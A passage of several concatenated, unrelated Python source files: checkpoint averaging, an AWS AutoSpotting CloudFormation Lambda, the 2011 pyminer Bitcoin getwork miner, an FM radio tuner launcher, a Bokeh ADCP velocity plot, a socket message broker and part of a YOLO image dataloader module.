    for path in ckpt_paths:
        if path.startswith('hdfs:'):
            local_path = f'tmp.get.{path.split("/")[-1]}'
            subprocess.run(['hadoop', 'fs', '-get', path, local_path])
            with open(local_path, 'rb') as fin:
                state_dict_list.append(torch.load(fin, map_location=device)['model'])
            subprocess.run(['rm', local_path])
        else:
            with open(path, 'rb') as fin:
                state_dict_list.append(torch.load(fin, map_location=device)['model'])
    state_dict = average_checkpoints(state_dict_list)
    return {"model": state_dict}
def average_checkpoints(state_dict_list: List):
    """Element-wise average of several model state dicts.

    Half-precision tensors are upcast to float before accumulating; the
    averaged values are returned as torch tensors in an OrderedDict.
    """
    accumulated = OrderedDict()
    for position, current in enumerate(state_dict_list):
        for key in current:
            value = current[key]
            if isinstance(value, torch.HalfTensor):
                value = value.float()
            if position == 0:
                accumulated[key] = value.numpy()
            else:
                accumulated[key] = accumulated[key] + value.numpy()
    count = len(state_dict_list)
    for key in accumulated:
        accumulated[key] = torch.from_numpy(accumulated[key] / count)
    return accumulated
# Recursive variant of _to_device: walks nested lists/tuples/dicts of tensors.
to_device = recursive(_to_device)
|
regional_stack_lambda.py | '''
Creates regional CloudFormation stacks that trigger the main AutoSpotting
Lambda function
'''
from json import dumps
from sys import exc_info
from threading import Thread
from traceback import print_exc
from boto3 import client
from botocore.exceptions import ClientError
from botocore.vendored import requests
from botocore.vendored.requests.exceptions import RequestException
SUCCESS = "SUCCESS"
FAILED = "FAILED"
STACK_NAME = 'AutoSpottingRegionalResources'
TEMPLATE_URL = \
'https://s3.amazonaws.com/cloudprowess/nightly/regional_template.yaml'
def create_stack(region, lambda_arn):
    '''Creates a regional CloudFormation stack'''
    cfn = client('cloudformation', region)
    # Remove any stack left over from a previous run before re-creating it.
    try:
        delete_stack(region)
    except ClientError:
        pass
    parameters = [{
        'ParameterKey': 'AutoSpottingLambdaARN',
        'ParameterValue': lambda_arn,
    }]
    response = cfn.create_stack(
        StackName=STACK_NAME,
        TemplateURL=TEMPLATE_URL,
        Capabilities=['CAPABILITY_IAM'],
        Parameters=parameters,
    )
    print(response)
def delete_stack(region):
    '''Deletes a regional CloudFormation stack and waits for completion'''
    cfn = client('cloudformation', region)
    print(cfn.delete_stack(StackName=STACK_NAME))
    # Poll every 5 s until CloudFormation reports the stack fully deleted.
    cfn.get_waiter('stack_delete_complete').wait(
        StackName=STACK_NAME,
        WaiterConfig={'Delay': 5},
    )
def handle_create(event):
    ''' Creates regional stacks in all available AWS regions concurrently '''
    ec2 = client('ec2')
    lambda_arn = event['ResourceProperties']['LambdaARN']
    workers = [
        Thread(target=create_stack, args=[region['RegionName'], lambda_arn])
        for region in ec2.describe_regions()['Regions']
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def handle_delete():
    ''' Concurrently deletes regional stacks in all available AWS regions '''
    ec2 = client('ec2')
    workers = [
        Thread(target=delete_stack, args=[region['RegionName']])
        for region in ec2.describe_regions()['Regions']
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def handler(event, context):
    ''' Lambda function entry point

    Dispatches on the CloudFormation custom-resource RequestType and always
    reports a final status back so the stack operation does not hang.
    '''
    try:
        if event['RequestType'] == 'Create':
            handle_create(event)
        if event['RequestType'] == 'Delete':
            handle_delete()
        send(event, context, SUCCESS, {})
    except ClientError:
        print_exc()
        print("Unexpected error:", exc_info()[0])
        send(event, context, FAILED, {})
def send(event, context, response_status, response_data):
    ''' Informs CloudFormation about the state of the custom resource

    Builds the standard custom-resource response body and PUTs it to the
    pre-signed ResponseURL supplied in the event.
    '''
    response_url = event['ResponseURL']
    print(response_url)
    response_body = {}
    response_body['Status'] = response_status
    response_body['Reason'] = \
        'See the details in CloudWatch Log Stream: ' + context.log_stream_name
    # The log stream name doubles as a stable physical resource id.
    response_body['PhysicalResourceId'] = context.log_stream_name
    response_body['StackId'] = event['StackId']
    response_body['RequestId'] = event['RequestId']
    response_body['LogicalResourceId'] = event['LogicalResourceId']
    response_body['NoEcho'] = None
    response_body['Data'] = response_data
    json_response_body = dumps(response_body)
    print("Response body:\n" + json_response_body)
    headers = {
        'content-type': '',
        'content-length': str(len(json_response_body))
    }
    try:
        response = requests.put(response_url,
                                data=json_response_body,
                                headers=headers)
        # Bug fix: the original printed response.reason (the phrase, e.g.
        # "OK") under the label "Status code"; print the numeric code.
        print("Status code: " + str(response.status_code))
    except RequestException as exception:
        print("send(..) failed executing requests.put(..): " + str(exception))
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for a bitcoind node (Python 2, httplib)."""
    OBJID = 1
    def __init__(self, host, port, username, password):
        # HTTP Basic auth header built from user:pass.
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # Keep-alive connection with a 30 s timeout, reused across calls.
        self.conn = httplib.HTTPConnection(host, port, False, 30)
    def rpc(self, method, params=None):
        """POST one JSON-RPC call; return the result, the error object, or
        None on transport / JSON decoding failures."""
        # NOTE(review): += on the class attribute creates an instance copy,
        # so request ids are effectively per-connection, not global.
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']
    def getblockcount(self):
        """Current best block height."""
        return self.rpc('getblockcount')
    def getwork(self, data=None):
        """Fetch mining work, or submit a solved block when *data* is given."""
        return self.rpc('getwork', data)
def uint32(x):
    """Truncate *x* to an unsigned 32-bit value (Python 2 long)."""
    return x & 0xffffffffL
def bytereverse(x):
    """Reverse the byte order of a 32-bit word (endianness swap)."""
    return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
        (((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
    """Byte-swap every 32-bit word of *in_buf* (byte string, length % 4 == 0)."""
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    """Reverse the order of the 32-bit words of *in_buf* (bytes within each word untouched)."""
    out_words = []
    for i in range(0, len(in_buf), 4):
        out_words.append(in_buf[i:i+4])
    out_words.reverse()
    return ''.join(out_words)
class Miner:
    """Single getwork-based CPU miner (Python 2, legacy protocol)."""
    def __init__(self, id):
        self.id = id
        # Per-round nonce budget; re-tuned each iteration to hit 'scantime'.
        self.max_nonce = MAX_NONCE
    def work(self, datastr, targetstr):
        """Scan nonces over one work unit.

        Returns (hashes_done, nonce_bin) where nonce_bin is the packed
        winning nonce, or None when the scan range was exhausted.
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        SWE_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]	# byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(SWE_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
#				return (nonce + 1, nonce_bin)
        return (nonce + 1, None)
    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the work data and submit it via getwork."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result
    def iterate(self, rpc):
        """Fetch one work unit, scan it, and re-tune max_nonce to 'scantime'."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
            work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # Scale the per-round nonce budget so one round takes ~scantime seconds.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                  self.id, hashes_done,
                  (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)
    def loop(self):
        """Connect to the RPC server and iterate forever."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
                 settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Worker-process entry point: build a Miner for this id and run its loop."""
    Miner(id).loop()
if __name__ == '__main__':
    # Python 2 CLI entry point: read a key=value config file and spawn miners.
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue

        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # defaults for any settings the config file omitted
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 8332
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # config values arrive as strings; normalize the numeric ones
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # despite the name, each mining "thread" is an OS process (multiprocessing)
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"

    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
radiotuner.py | #!/usr/bin/env python3
from backend.streamer import AudioPipe
from backend.player import player_main
from frontend.tui import TUI_main
from frontend.webserver import define_webserver
from threading import Thread
from queue import Queue
import argparse
import socket
# Parse arguments
parser = argparse.ArgumentParser(description='Tune FM radio.')
parser.add_argument(metavar='freq', type=float, dest='freq',
                    help='the tune frequency in MHz')
parser.add_argument("-ui", default='none', help=" select User Interface none/terminal/web")
parser.add_argument("-port", default='8081', help=" port used for web UI")
# NOTE(review): -port has no type=int, so args.port stays a str and is passed
# as a string to sio.run() below -- confirm the server accepts that.
args = parser.parse_args()
if args.ui != 'none' and args.ui != 'terminal' and args.ui != 'web':
    print('Invalid UI. Please use: none | terminal | web')
    quit()

# Create inter thread communication queues
player_q = Queue()  # commands destined for the player thread
tui_q = Queue()     # commands destined for the terminal UI thread

# Create WebServer (without starting it)
[app, sio] = define_webserver(player_q)

# Create player thread (without starting it)
th_player = Thread(target=player_main, args=(player_q, tui_q, sio, args.freq))

# Create TUI thread (without starting it)
th_tui = Thread(target=TUI_main, args=(tui_q, player_q))

# Create streamer (without starting it)
#audio = AudioPipe()

try:
    # Start streaming audio from Radio to Speaker
    #audio.start()

    # Start player thread
    th_player.start()

    if args.ui == 'terminal':
        th_tui.start()

    # This has to go last, as sio.run is blocking
    if args.ui == 'web':
        print('Starting Web UI on: http://' + str(socket.gethostname()) + ':' + str(args.port))
        # Start Webserver
        sio.run(app, port=args.port, host='0.0.0.0', debug=False)
        # When server ends, end app
        player_q.put(['quit',0])

    # Wait for threads to end
    if th_tui.is_alive():
        th_tui.join()
    if th_player.is_alive():
        th_player.join()

    # Stop audio stream
    #if audio is not None:
    #    audio.stop()
except KeyboardInterrupt:
    # Ctrl-C: ask both threads to quit, then wait for them to exit
    if th_tui.is_alive():
        tui_q.put(['quit', None, None])
        th_tui.join()
    if th_player.is_alive():
        player_q.put(['quit',0])
        th_player.join()
    #if audio is not None:
    #    audio.stop()
|
main.py | import logging
import threading
from bokeh.io import curdoc
from bokeh.models import ColumnDataSource
from bokeh.plotting import Figure
from Comm.EnsembleJsonData import ADCP
from Ensemble.Ensemble import Ensemble
# Module-level logger for the live-plot app: DEBUG level, timestamped format.
logger = logging.getLogger("EnsembleReceiver")
logger.setLevel(logging.DEBUG)
FORMAT = '[%(asctime)-15s][%(levelname)s][%(funcName)s] %(message)s'
logging.basicConfig(format=FORMAT)
class BeamVelocityLivePlot:
    """
    Plot Beam Velocity data live using Bokeh server.

    bokeh serve .
    """

    def __init__(self, udp_port):
        """
        Build the Bokeh figure and start the background ADCP reader.

        :param udp_port: UDP Port to read the JSON data.
        """
        super().__init__()

        # Streaming source: bin index on y, beam 0/1 velocities on x
        self.source = ColumnDataSource(dict(bins=[], beamVelB0=[], beamVelB1=[]))
        self.lastData = None

        fig = Figure()
        fig.line(source=self.source, x='beamVelB0', y='bins', line_width=2, alpha=.85, color='red')
        fig.line(source=self.source, x='beamVelB1', y='bins', line_width=2, alpha=.85, color='blue')
        curdoc().add_root(fig)
        curdoc().add_periodic_callback(self.update_data, 200)  # poll every 200 ms

        # Read ensembles on a background thread so Bokeh callbacks stay responsive.
        self.Adcp = ADCP()
        # Fix: honor the udp_port argument (was hard-coded to 55057; the only
        # caller passes 55057, so behavior is unchanged for existing code).
        self.t = threading.Thread(target=self.Adcp.connect, args=[udp_port])
        self.t.start()

        logger.info("init Beam Velocity plot")

    def close(self):
        """Disconnect the ADCP reader."""
        logger.info("Close plot")
        self.Adcp.close()

    def update_data(self):
        """Periodic callback: stream the latest beam-velocity profile to the plot."""
        # Fix: the original guard used `and` plus a no-op `pass`, so a single
        # missing structure fell through and crashed on the None access below.
        if self.Adcp.EnsembleData is None or self.Adcp.BeamVelocity is None:
            return

        bins = []
        velB0 = []
        velB1 = []
        velB2 = []  # collected but not plotted yet
        velB3 = []  # collected but not plotted yet
        for bin in range(self.Adcp.EnsembleData["NumBins"]):
            bins.append(bin)

            # NOTE(review): this keeps values flagged "bad" and zeroes the rest;
            # verify the condition is not inverted w.r.t. is_float_close's intent.
            if Ensemble().is_float_close(self.Adcp.BeamVelocity["Velocities"][bin][0], Ensemble().BadVelocity):
                velB0.append(self.Adcp.BeamVelocity["Velocities"][bin][0])
            else:
                velB0.append(0.0)

            if Ensemble().is_float_close(self.Adcp.BeamVelocity["Velocities"][bin][1], Ensemble().BadVelocity):
                velB1.append(self.Adcp.BeamVelocity["Velocities"][bin][1])
            else:
                velB1.append(0.0)

            velB2.append(self.Adcp.BeamVelocity["Velocities"][bin][2])
            velB3.append(self.Adcp.BeamVelocity["Velocities"][bin][3])

        new_data = dict(beamVelB0=velB0, beamVelB1=velB1, bins=bins)
        self.source.stream(new_data, 100)  # keep at most 100 points per column
# Script entry: construct the plot (Bokeh serves the module's top level).
logger.info("Start Beam Velocity Plot")
amp = BeamVelocityLivePlot(55057)
#amp.close()
logger.info("Beam Velocity Plot Closed")
|
broker.py | import selectors
import socket
import types
import queue
import threading
from message_handler import MessageHandler
from datetime import datetime
class Broker():
    """Selector-based message broker.

    Producers enqueue messages via push(); a background thread accepts
    consumer connections and streams queued messages to writable sockets.
    """

    _BINDING_IP = '127.0.0.1'
    _BINDING_PORT = 65432
    _consumerSelector = None
    _QUEUE_SIZE = 2
    _messageQueue = None
    _messageHandler = None
    _MAX_BUFFER_SIZE = 4096  # max bytes handed to a single socket.send()

    def __init__(self):
        # Bounded queue: push() blocks when consumers fall behind.
        self._messageQueue = queue.Queue(self._QUEUE_SIZE)
        self._messageHandler = MessageHandler()

    def _initiateConsumerSelector(self):
        """Bind the listening socket and enter the accept/serve loop (blocks forever)."""
        self._consumerSelector = selectors.DefaultSelector()
        lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Fix: SO_REUSEADDR must be set before bind() to have any effect.
        lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        lsock.bind((self._BINDING_IP, self._BINDING_PORT))
        lsock.listen()
        print('listening on', (self._BINDING_IP, self._BINDING_PORT))
        lsock.setblocking(False)
        # data=None marks the listening socket in the event loop
        self._consumerSelector.register(lsock, selectors.EVENT_READ, data=None)
        self._acceptConnections()

    def _register(self, sock):
        """Accept a new consumer connection and register it for write events."""
        conn, addr = sock.accept()  # Should be ready to read
        print('accepted connection from', addr)
        conn.setblocking(False)
        data = types.SimpleNamespace(addr=addr, outb=b'')
        events = selectors.EVENT_WRITE
        self._consumerSelector.register(conn, events, data=data)

    def _acceptConnections(self):
        """Event loop: accept new connections and service writable consumers."""
        while True:
            events = self._consumerSelector.select(timeout=None)
            for key, mask in events:
                if key.data is None:
                    self._register(key.fileobj)
                else:
                    self._service_connection(key, mask)

    def _sendAll(self, sock, data):
        """Send `data` in _MAX_BUFFER_SIZE chunks until all bytes are handed off."""
        dataLength = len(data)
        while dataLength > self._MAX_BUFFER_SIZE:
            self._safeSend(sock, data[:self._MAX_BUFFER_SIZE])
            dataLength -= self._MAX_BUFFER_SIZE
            data = data[self._MAX_BUFFER_SIZE:]
        # send remaining bytes
        self._safeSend(sock, data)

    def _safeSend(self, sock, data):
        """Send one chunk, retrying on EWOULDBLOCK and dropping dead consumers.

        Rewritten from unbounded recursion to a loop so repeated EWOULDBLOCK
        cannot exhaust the stack. (Param renamed `sock` so it no longer shadows
        the `socket` module.)
        """
        while True:
            try:
                # NOTE(review): send() may write fewer bytes than len(data);
                # partial sends are not resent here.
                sock.send(data)  # Should be ready to write
                return
            except BlockingIOError:
                # Resource temporarily unavailable (errno EWOULDBLOCK)
                print('Resource temporarily unavailable: trying again...')
                continue
            except BrokenPipeError:
                #ToDo try to send the entire data again
                print('connection lost')
                self._consumerSelector.unregister(sock)
                sock.close()
                return

    def _service_connection(self, key, mask):
        """Pop the next queued message and stream it to a writable consumer."""
        sock = key.fileobj
        dataOverSocket = key.data
        if mask & selectors.EVENT_WRITE:
            data = self._pop()  # blocks until a message is available
            if data:
                self._sendAll(sock, data)

    def start(self):
        """Run the broker's accept/serve loop on a background thread."""
        initThread = threading.Thread(target=self._initiateConsumerSelector)
        initThread.start()

    def push(self, data=None, meta=None, isByteData=False):
        """Wrap `data` in a message packet and enqueue it (blocks when the queue is full).

        Fix: the original fell through on a no-op `pass` and still built a
        packet from None; empty pushes are now skipped entirely.
        """
        if data is None:
            print('No data to push')
            return
        packet = self._messageHandler.createMessage(data, meta, isByteData)
        self._messageQueue.put(packet, block=True)

    def _pop(self):
        """Dequeue the next packet, blocking until one is available."""
        return self._messageQueue.get(block=True)
datasets.py | # Dataset utils and dataloaders
import glob
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
import pickle
from copy import deepcopy
from pycocotools import mask as maskUtils
from torchvision.utils import save_image
from utils.general import xyxy2xywh, xywh2xyxy
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng']  # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv']  # acceptable video suffixes

# Get orientation exif tag
# (resolve the numeric EXIF key for 'Orientation' once at import time;
# exif_size() uses the resulting module-level `orientation` value)
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def get_hash(files):
    """Return a single hash value for a list of files: the summed sizes of those that exist."""
    total = 0
    for path in files:
        if os.path.isfile(path):
            total += os.path.getsize(path)
    return total
def exif_size(img):
    """Return the EXIF-corrected PIL image size as (width, height).

    Swaps width/height when the EXIF Orientation tag indicates a 90- or
    270-degree rotation; falls back to the raw size on any error
    (no EXIF data, no Orientation tag, etc.).
    """
    s = img.size  # (width, height)
    try:
        rotation = dict(img._getexif().items())[orientation]
        if rotation == 6:  # rotation 270
            s = (s[1], s[0])
        elif rotation == 8:  # rotation 90
            s = (s[1], s[0])
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; behavior is otherwise unchanged.
        pass
    return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
                      rank=-1, world_size=1, workers=8):
    """Build a LoadImagesAndLabels dataset plus an InfiniteDataLoader over it.

    Returns (dataloader, dataset).
    """
    # In DDP, let rank 0 scan/cache the dataset first; the other ranks
    # then reuse the cache instead of re-scanning.
    with torch_distributed_zero_first(rank):
        dataset = LoadImagesAndLabels(path, imgsz, batch_size,
                                      augment=augment,  # augment images
                                      hyp=hyp,  # augmentation hyperparameters
                                      rect=rect,  # rectangular training
                                      cache_images=cache,
                                      single_cls=opt.single_cls,
                                      stride=int(stride),
                                      pad=pad,
                                      rank=rank)

    batch_size = min(batch_size, len(dataset))
    # Worker count: bounded by CPUs per process, batch size, and the requested cap.
    num_workers = min(os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers)
    if rank != -1:
        sampler = torch.utils.data.distributed.DistributedSampler(dataset)
    else:
        sampler = None
    loader = InfiniteDataLoader(dataset,
                                batch_size=batch_size,
                                num_workers=num_workers,
                                sampler=sampler,
                                pin_memory=True,
                                collate_fn=LoadImagesAndLabels.collate_fn)  # torch.utils.data.DataLoader()
    return loader, dataset
def create_dataloader9(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
                       rank=-1, world_size=1, workers=8):
    """Build a LoadImagesAndLabels9 (9-image-mosaic) dataset plus an InfiniteDataLoader.

    Returns (dataloader, dataset).
    """
    # In DDP, let rank 0 scan/cache the dataset first; the other ranks
    # then reuse the cache instead of re-scanning.
    with torch_distributed_zero_first(rank):
        dataset = LoadImagesAndLabels9(path, imgsz, batch_size,
                                       augment=augment,  # augment images
                                       hyp=hyp,  # augmentation hyperparameters
                                       rect=rect,  # rectangular training
                                       cache_images=cache,
                                       single_cls=opt.single_cls,
                                       stride=int(stride),
                                       pad=pad,
                                       rank=rank)

    batch_size = min(batch_size, len(dataset))
    # Worker count: bounded by CPUs per process, batch size, and the requested cap.
    num_workers = min(os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers)
    if rank != -1:
        sampler = torch.utils.data.distributed.DistributedSampler(dataset)
    else:
        sampler = None
    loader = InfiniteDataLoader(dataset,
                                batch_size=batch_size,
                                num_workers=num_workers,
                                sampler=sampler,
                                pin_memory=True,
                                collate_fn=LoadImagesAndLabels9.collate_fn)  # torch.utils.data.DataLoader()
    return loader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
    """ Dataloader that reuses workers

    Uses same syntax as vanilla DataLoader
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # batch_sampler is effectively read-only on DataLoader, so bypass
        # __setattr__ to swap in a sampler that repeats forever; the single
        # persistent iterator below keeps the worker processes alive.
        object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
        self.iterator = super().__iter__()

    def __len__(self):
        # length of one epoch, even though the underlying iterator never stops
        return len(self.batch_sampler.sampler)

    def __iter__(self):
        # yield exactly one epoch's worth of batches from the persistent iterator
        for i in range(len(self)):
            yield next(self.iterator)
class _RepeatSampler(object):
    """Wrap a sampler so that iterating it never terminates.

    Args:
        sampler (Sampler)
    """

    def __init__(self, sampler):
        self.sampler = sampler

    def __iter__(self):
        # Endlessly restart the wrapped sampler once it is exhausted.
        while True:
            for item in self.sampler:
                yield item
class LoadImages:  # for inference
    """Iterator over image files and video frames for inference.

    Each step yields (path, letterboxed RGB CHW image, original BGR image, cap),
    where cap is the cv2.VideoCapture handle (None for still images).
    """

    def __init__(self, path, img_size=640, auto_size=32):
        # Resolve the input path into a flat, sorted list of media files.
        p = str(Path(path))  # os-agnostic
        p = os.path.abspath(p)  # absolute path
        if '*' in p:
            files = sorted(glob.glob(p, recursive=True))  # glob
        elif os.path.isdir(p):
            files = sorted(glob.glob(os.path.join(p, '*.*')))  # dir
        elif os.path.isfile(p):
            files = [p]  # files
        else:
            raise Exception('ERROR: %s does not exist' % p)

        # Split by extension using module-level img_formats/vid_formats.
        images = [x for x in files if x.split('.')[-1].lower() in img_formats]
        videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
        ni, nv = len(images), len(videos)

        self.img_size = img_size
        self.auto_size = auto_size  # stride multiple used by letterbox padding
        self.files = images + videos
        self.nf = ni + nv  # number of files
        self.video_flag = [False] * ni + [True] * nv
        self.mode = 'images'
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
                            (p, img_formats, vid_formats)

    def __iter__(self):
        self.count = 0
        return self

    def __next__(self):
        """Return the next image or video frame, letterboxed and converted to RGB CHW."""
        if self.count == self.nf:
            raise StopIteration
        path = self.files[self.count]

        if self.video_flag[self.count]:
            # Read video
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                # current video exhausted: advance to the next file
                self.count += 1
                self.cap.release()
                if self.count == self.nf:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()

            self.frame += 1
            print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')

        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            #print('image %g/%g %s: ' % (self.count, self.nf, path), end='')

        # Padded resize
        img = letterbox(img0, new_shape=self.img_size, auto_size=self.auto_size)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return path, img, img0, self.cap

    def new_video(self, path):
        # Open a new video and reset the per-video frame counter.
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nf  # number of files
class LoadWebcam:  # for inference
    """Iterator over frames from a local webcam or an IP-camera stream."""

    def __init__(self, pipe='0', img_size=640):
        self.img_size = img_size

        if pipe.isnumeric():
            # NOTE(review): eval() on the input string; int(pipe) would be safer
            # if pipe is always a device index -- confirm callers.
            pipe = eval(pipe)  # local camera
        # pipe = 'rtsp://192.168.1.64/1'  # IP camera
        # pipe = 'rtsp://username:password@192.168.1.64/1'  # IP camera with login
        # pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg'  # IP golf camera

        self.pipe = pipe
        self.cap = cv2.VideoCapture(pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        """Grab one frame; pressing 'q' in the OpenCV window stops iteration."""
        self.count += 1
        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration

        # Read frame
        if self.pipe == 0:  # local camera
            ret_val, img0 = self.cap.read()
            img0 = cv2.flip(img0, 1)  # flip left-right
        else:  # IP camera
            n = 0
            while True:
                n += 1
                self.cap.grab()
                if n % 30 == 0:  # skip frames
                    ret_val, img0 = self.cap.retrieve()
                    if ret_val:
                        break

        # Print
        assert ret_val, 'Camera Error %s' % self.pipe
        img_path = 'webcam.jpg'
        print('webcam %g: ' % self.count, end='')

        # Padded resize
        img = letterbox(img0, new_shape=self.img_size)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return img_path, img, img0, None

    def __len__(self):
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """Iterator over frames from several camera/stream sources at once.

